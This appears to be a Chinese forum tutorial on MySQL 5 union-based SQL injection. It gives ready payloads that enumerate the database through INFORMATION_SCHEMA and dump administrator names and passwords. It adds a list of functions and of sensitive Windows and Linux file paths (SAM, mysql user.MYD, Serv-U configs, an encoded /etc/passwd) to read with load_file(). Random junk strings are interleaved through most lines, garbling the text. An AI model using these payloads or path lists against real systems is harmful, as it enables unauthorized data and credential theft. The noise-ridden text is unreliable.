mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
! |" `& ~4 f; W$ h' r$ s


Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
2 k, ?% Y- Z! y2 V3 n中记录了Mysql中所有
9 `& @2 ^4 ?2 C, O存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
7 f$ w- E% C! a明。
" ~! G' `! [9 T" V* `9 i* a. _1.得到所有数据库名：
* C" E* e# u' Y/ @7 O* B|SCHEMATA ->存储数据库名的表
' P7 h# u1 U& z$ V; ~* b3 K$ o|—字段：SCHEMA_NAME ->数据库名称

4 b+ ?) _7 H+ t- X! r4 E|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
) k2 I, N$ H# M+ D& O8 l  l|—字段：TABLE_NAME ->存储表的表名
  U/ i% e. @1 M7 t- n2 M' i
* P8 d; b0 y, Y9 s4 B; ]( M( R|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

6 K9 j' X5 P* i3 H0 B+ j|—字段：COLUMN_NAME ->该字段的名称
0 C" A0 Y. e% Q  u& F
#########################################################################
##
& @% f' r5 B& S- X  c0 M
" O2 f& a0 K! y# Z/ n8 j. K9 T0×001 获取系统信息:

union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
& V" [" X4 b5 \
/*

, @4 i8 ~4 Z; u! j# t0 {@@global.version_compile_os 获取系统版本
" h: t7 ]% j6 y8 A0 N6 Z
@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
* T" M7 }! M. {9 R2 d# S
! G) W4 _8 e$ }1 [*/

######################################################################
8 e/ M$ M7 G, r
& E/ E$ [! b, E4 a& Q; c0×002 获取表名

0 K2 J$ O: X! f9 punion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
9 `" ]0 [* p7 Q8 x, Q: Z' G+ Iinformation_schema.tables where table_schema=0x67617264656e /*
# R. n+ a: Y+ b
. D2 F' O- P$ @5 N4 U1 H( H/*
- h2 \1 v  |: V5 w, W! P+ p
- W! M+ S7 O3 n  n% Q0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

3 O( X8 C" d& d4 P, p*/

######################################################################
. n& O: \. ^% D% `
7 Y" g( X5 b, Y% ]( G5 R0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and

1 V* E! e4 |: e( Y
$ j3 y% d. M& xtable_schema=0x67617264656e limit 1 /*

8 ~2 B8 X$ `+ h* G2 \/*
$ K; l: z- K+ s% J2 p% L
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
/ _$ N$ I1 [6 o0 O( B; U
0x67617264656e ->数据库名

*/
- @9 C! @8 y; E5 |; f
#####################################################################
9 V$ b: P$ r+ L6 I
0×004 获取数据
8 o: \6 T' v  n! h& o( \" X
5 M0 ?  W6 D7 D3 \union select 1,2,3
) j& a& M: H& m,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

  m/ Z) G! M& {' g& Aunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
: v. [* E' M1 L(adpassword),6,7,8 from admin

/*

6 ~7 J+ Q( G, F5 Z( y  u0x3c62723e 换行符号HEX编码
5 F; D- Y' I. }. }+ [, ]
% K- o5 B4 U! Tgroup_concat 同时获得该字段所有数据

+ t8 N/ g$ B5 A# G0 m  Z6 [0 T, H*/

8 Q# j5 Z  J6 B. S& g
. ^( S7 L: {! o8 V- s6 ]; Q


顺便添加一些mysql注入时非常有用的一些东西
. K- B" H& U0 B/ c7 O+ d
2 Q1 w, H. K! E简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
0 w0 t. ?+ P5 ^" ~1 z  a
( u; _/ P8 _( w; S1:system_user() 系统用户名
3 @+ M( w3 P: D1 l2:user()        用户名
3:current_user()  当前用户名
5 ?3 f3 h5 i/ N7 G$ M6 k. h4:session_user()连接数据库的用户名
" H1 C- u# W) N& p, P2 G: C5:database()    数据库名
6:version()     MYSQL数据库版本
8 D8 q& s3 H' l% c/ ~7 w, C7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
6 {  C& B+ Q* V9@basedir    MYSQL 安装路径
" l9 W2 `5 k8 P& @+ _: W0 A: F10@version_compile_os   操作系统  Windows Server 2003,
  W0 i: D+ [  H; g/ }; X1 _! \收集的一些路径：
WINDOWS下:
c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
* V( B- m4 j; p( Vc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
+ I$ p0 s, {: t! ec:/winnt/php.ini
- U. }" J4 g& I" @7 U/ Ec:/winnt/my.ini
6 z1 F- A4 \% p; N0 W3 rc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
$ e5 T! G0 I' \8 X& ~$ \; Xc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
8 K5 \' D/ w$ d) U6 pc:\Program Files\Serv-U\ServUDaemon.ini
- s9 ~! v! f* _4 \$ X1 ic:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
5 P6 ?; n' U" _$ N- V, Ac:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
3 P& q: C0 S; W5 x* D6 wc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
6 w6 j) L7 H0 v0 O/ y7 w( C5 |* ~C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
1 _! R5 ], n# E6 Q4 V8 gc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
, A' X( S0 {( D0 L/ m, m3 Sc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
- I+ q* D- Y2 ]$ W8 @& ^, u  i

c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
" ^- |9 S) X: {( Z/ r. SC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
: V: c" z' M+ K& w- H% n9 l! ?! H0 |/usr/local/apache2/conf/httpd.conf
. ?, |5 s8 R0 X/ j/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
$ J6 E$ R( ]3 O" y/usr/local/app/php5/lib/php.ini //PHP相关设置
: U: k" q+ [$ J* D/ q' M* k/etc/sysconfig/iptables //从中得到防火墙规则策略
' {; L3 {" r( j# v5 E/etc/httpd/conf/httpd.conf // apache配置文件
3 \: H/ |8 Z8 W$ {, L/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
5 ~) X- n( `4 F# g/etc/issue
/etc/issue.net
+ P- T' W8 T3 Q  f0 C: X/usr/local/app/php5/lib/php.ini //PHP相关设置
4 k: G( T' m9 _$ q( B0 t3 @' |1 x/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
$ C1 P3 K  b" }/ G+ U/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
# E* \( U2 j( [# p! _/ F; T/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
8 J6 D& [! p2 {2 y" x/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
, E- k  G; q+ k/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
! j1 [/ C! b, J) l5 Q/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
: o7 u1 |8 x* r+ V# a3 N) Wreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
: I6 O* O  u* B3 k* O0 _1 _上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
5 O. {7 M2 \; @+ O  t2 M3 \
& a+ G3 [6 p" E8 y" }; L( ^1 Q! n